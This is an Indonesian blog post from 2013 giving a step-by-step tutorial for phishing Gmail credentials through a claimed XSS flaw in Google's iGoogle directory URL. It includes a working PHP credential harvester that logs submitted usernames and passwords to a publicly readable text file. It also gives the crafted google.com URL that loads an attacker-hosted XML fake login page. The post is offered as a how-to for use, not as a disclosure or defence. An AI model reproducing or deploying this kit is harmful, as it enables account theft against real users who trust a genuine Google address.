Sabtu, 09 Februari 2013

Memanfaatkan Bug XSS di Google untuk Phishing (Fake Gmail Login)


Tutorial kali ini membuat Fake gmail login dengan memanfaatkan Bug XSS yang ada di situs Google dengan alamat url http://www.google.com/ig/directory?url=

1. Buat coding dengan format XML, seperti ini http://inwepo.com/test/google.xml

2. Buat coding PHP, berikut ini :

<?php
$username = $_POST['username'];
$password = $_POST['password'];
$logs = "save.txt";
$ld = fopen($logs, 'a') or die(" ");
$data = "$username:$password \n";
fwrite($ld, $data);
echo "Sorry this is Phishing!";
?>

Simpan dengan nama save.php

3. Kemudian upload semua script ke hosting kamu.

4. Akses dengan alamat sesuai nama domain kamu contohnya http://www.google.com/ig/directory?url=inwepo.com/test/google.xml

5. Bila ada seseorang yang mencoba login maka username dan password akan otomatis tersimpan di file txt. Akses dengan alamat  http://inwepo.com/test/save.txt

Sekian, semoga Google mau memperbaiki Bug XSS ini :)


0 komentar:

Posting Komentar